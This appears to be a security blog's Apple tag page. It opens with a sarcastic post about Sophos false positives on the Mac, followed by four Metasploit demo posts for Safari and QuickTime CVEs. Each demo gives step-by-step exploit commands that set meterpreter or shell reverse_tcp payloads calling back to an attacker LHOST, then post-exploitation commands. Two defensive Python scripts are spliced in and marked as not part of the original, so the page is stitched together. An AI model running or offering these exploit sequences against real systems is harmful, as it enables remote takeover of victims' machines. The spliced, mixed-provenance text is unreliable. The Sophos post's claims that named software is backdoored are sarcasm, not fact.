Posts tagged Apple

10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?

On April 24, the Sophos Naked Security blog published a post regarding malware infections on Mac OS X. Sophos claimed that 20% of Mac computers were carrying one or more instances of Windows malware. All of this malware was detected through their free Sophos Anti-Virus for Mac Home Edition.

Flashback malware was the big story of April for Mac consumers, and all anti-virus companies have jumped on this opportunity to promote their products and to spread propaganda around Mac OS X security. I agree with them that Mac OS X is a product like any other product, and that Mac OS X also has to be protected against threats, but the proposed solutions are worse than doing nothing.

 

During my tests of Sophos Anti-Virus for Mac Home Edition, 10 of 10 malwares detected by the anti-virus were false positives, harassing me with constant alert pop-ups during regular operations, Spotlight indexing and Time Machine backups. Below is a sample of 10 infections detected by Sophos Anti-Virus for Mac.

Perl/FtpExp-A

False positives due to the binary format of the “affected” files.

/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
/Users/xxxx/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/#s.ytimg.com/settings.sol

Troj/BredoZp-JO

Sophos itself is a trojan, and some iTunes applications and Chrome are backdoored and nobody knows about it.

/Library/Preferences/com.sophos.sav.plist
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist

Troj/BredoZp-JN

iTunes is a very well-known backdoored software, and once again Sophos itself contains a trojan.

/Users/xxxx/Library/Caches/com.apple.iTunes/goog-phish-shavar.db
/Library/Preferences/com.sophos.sav.plist

Troj/Iframe-HY

Once again Sophos is a trojan, and now my Spotlight index files also contain a backdoor.

/Library/Preferences/com.sophos.sav.plist
/Volumes/xxxx/.Spotlight-V100/Store-V2/700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings

Mal/IRCBot-O 

VLC contains an IRC bot: gotcha, remote control of all VLC users.

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Troj/PhpShell-Z

Once again VLC, which now contains a PHP trojan …

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Mal/PHPShell-A 

Everybody knows that Sophos Anti-Virus products are developed in PHP.

/Library/Preferences/com.sophos.sav.plist

Troj/PDFJs-B 

Help, my logs contain trojans, and Sophos once again.

/private/var/log/DiagnosticMessages/2012.05.05.asl
/Library/Preferences/com.sophos.sav.plist

Mal/Badsrc-C

My Spotlight index has a dead malware…

/.Spotlight-V100/Store-V2/DeadFiles/orphan.ef786332/0000/0000/0151/22087716.txt

Troj/PhoexRef-A

Huh, my screenshots of Metasploit contain trojans (why not, lol) and Google Drive is backdoored.

/Users/xxxx/Desktop/screenshots/metasploit-vmware-modules-research.png
/Users/xxxx/Library/Application Support/Google/Drive/sync_config.db
/usr/share/zoneinfo/UTC
/Library/Preferences/com.sophos.sav.plist

In conclusion, Sophos is better at marketing and at scaring consumers than at creating a good Mac anti-virus that really detects something.
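A way to sort a detection list like the one above for false-positive review, as an added example that is not part of the original post or of any Sophos tool. The marker list and hint names are assumptions chosen from the paths in the post; the detections are a subset copied from it, and a hint marks a file for review rather than proving a false positive.

```python
from collections import defaultdict

# Files that other tools derive from existing content (assumption: from the post).
DERIVED_MARKERS = {
    "/.Spotlight-V100/": "spotlight-index",
    "/Saved Application State/": "saved-state",
    "/Library/Caches/": "cache",
    "/private/var/log/": "log",
}

# A subset of the detections listed in the post, as (signature, path).
DETECTIONS = [
    ("Troj/BredoZp-JO", "/Library/Preferences/com.sophos.sav.plist"),
    ("Troj/BredoZp-JN", "/Library/Preferences/com.sophos.sav.plist"),
    ("Troj/Iframe-HY", "/Library/Preferences/com.sophos.sav.plist"),
    ("Troj/Iframe-HY", "/Volumes/xxxx/.Spotlight-V100/Store-V2/"
     "700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings"),
    ("Mal/IRCBot-O", "/Applications/VLC.app/Contents/Resources/"
     "English.lproj/InfoPlist.strings"),
    ("Troj/PhpShell-Z", "/Applications/VLC.app/Contents/Resources/"
     "English.lproj/InfoPlist.strings"),
    ("Troj/PDFJs-B", "/private/var/log/DiagnosticMessages/2012.05.05.asl"),
    ("Troj/PhoexRef-A", "/usr/share/zoneinfo/UTC"),
]

def derived_kind(path):
    for marker, label in DERIVED_MARKERS.items():
        if marker in path:
            return label
    return None

def triage(detections):
    """Map each path to review hints; an empty list means no hint applies."""
    signatures = defaultdict(set)
    for signature, path in detections:
        signatures[path].add(signature)
    report = {}
    for path, names in signatures.items():
        hints = []
        kind = derived_kind(path)
        if kind:  # content copied from elsewhere by an indexer, cache or logger
            hints.append("derived:" + kind)
        if len(names) > 1:  # one file matched by several unrelated signatures
            hints.append("multi-signature:%d" % len(names))
        report[path] = hints
    return report

if __name__ == "__main__":
    for path, hints in triage(DETECTIONS).items():
        print(", ".join(hints) or "no hint", "|", path)
```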

CVE-2011-3230 Apple Safari file:// Arbitrary Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Aaron Sigel
Coordinated release of the vulnerability on 2011-10-12
Metasploit PoC provided on 2011-10-16

PoC provided by :

Aaron Sigel
sinn3r

Reference(s) :

CVE-2011-3230
HT5000

Affected version(s) :

Safari 5.1 for Mac OS X v10.6.8
Safari 5.1 for Mac OS X Server v10.6.8
Safari 5.1 for OS X Lion v10.7.2
Safari 5.1 for OS X Lion Server v10.7.2

Tested on Mac OS X 10.7.1 with :

Safari 5.1 (7524.48.3) and Java SE Runtime Environment (build 1.6.0_26-b03-383-11A511)

Description :

This module exploits a vulnerability found in Apple Safari on OSX platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OSX might automount), and then execute it in /Volumes/[share]. If there’s some kind of bug that leaks the victim machine’s current username, then it’s also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.

Commands :

use exploit/osx/browser/safari_file_policy
set SRVHOST 192.168.178.21
set URIPATH /readme.html
set TARGET 1
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo
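A detection-side check for the behaviour in the description above, as an added example that is not part of the original post or of the Metasploit module: it flags pages served over HTTP(S) that reference `file://` URLs under `/Volumes/[share]` or `/Users/[username]/Downloads/`. It assumes the reference appears as a literal URL in markup or script; the function names and the sample page are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

FILE_URL = re.compile(r"file://[^\s\"'<>)]+", re.IGNORECASE)
# Local locations named in the module description.
RISKY = [("mounted-share", re.compile(r"^/Volumes/[^/]+/")),
         ("user-downloads", re.compile(r"^/Users/[^/]+/Downloads/"))]

class FileUrlFinder(HTMLParser):
    """Collects file:// URLs from attribute values, text and script bodies."""
    def __init__(self):
        super().__init__()
        self.urls = []
    def handle_starttag(self, tag, attrs):
        for _, value in attrs:
            if value:
                self.urls += FILE_URL.findall(value)
    def handle_data(self, data):
        self.urls += FILE_URL.findall(data)

def scan(page_url, html):
    """Return (label, url) pairs for risky file:// references in a remote page."""
    if urlparse(page_url).scheme not in ("http", "https"):
        return []  # local documents may legitimately link to local files
    finder = FileUrlFinder()
    finder.feed(html)
    finder.close()
    findings = []
    for url in finder.urls:
        path = unquote(urlparse(url).path)
        findings += [(label, url) for label, pat in RISKY if pat.match(path)]
    return findings

# Constructed sample page, not taken from the module.
SAMPLE = """<html><body><a href="file:///etc/hosts">hosts</a>
<script>window.location = "file:///Volumes/share/readme.jar";</script>
<iframe src="file:///Users/alice/Downloads/update.jar"></iframe></body></html>"""

if __name__ == "__main__":
    for label, url in scan("http://192.0.2.10/readme.html", SAMPLE):
        print(label, url)
```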

CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo

Timeline :

Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI on 2011-04-11
Coordinated public release of the vulnerability on 2011-08-08
Metasploit PoC provided on 2011-09-03

PoC provided by :

MC

Reference(s) :

CVE-2011-0257
ZDI-11-252

Affected version(s) :

All Apple QuickTime Player versions prior to 7.7

Tested on Windows XP SP3 with :

Apple QuickTime Player 7.6 (472)

Description :

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

CVE-2010-1818 : Metasploit _Marshaled_pUnk QuickTime Remote Code Execution

Timeline :

Vulnerability discovered by HBelite and disclosed to ZDI
Vulnerability disclosed by ZDI to the vendor on 2010-06-30
Exploit-DB PoC provided by Ruben Santamarta on 2010-08-30
Metasploit PoC provided on 2010-08-30
Coordinated vulnerability disclosure on 2010-08-31

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-1818
ZDI-10-168

Affected version(s) :

Apple QuickTime 7.6.7

Tested on Windows XP SP3 with :

QuickTime 7.6.7
Internet Explorer 8

Description :

This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.

Commands :

use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2007-2175 : Apple QTJava toQTPointer() Arbitrary Memory Access

Timeline :

Vulnerability discovered by Shane Macaulay & Dino Dai Zovi during CanSecWest 2007
Vulnerability reported to ZDI by Dino A. Dai Zovi & Shane Macaulay
Vulnerability reported to the vendor by ZDI on 2007-04-23
Coordinated vulnerability disclosure on 2007-05-01
Metasploit PoC provided on 2007-05-29

PoC provided by :

hdm
kf
ddz

Reference(s) :

CVE-2007-2175
ZDI-07-023

Affected version(s) :

QuickTime 7 versions prior to 7.1.6 for Windows and OS X

Tested on Windows XP SP3 with :

QuickTime 7.1.5

Description :

This module exploits an arbitrary memory access vulnerability in the Quicktime for Java API provided with Quicktime 7.

Commands :

use exploit/multi/browser/qtjava_pointer
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig
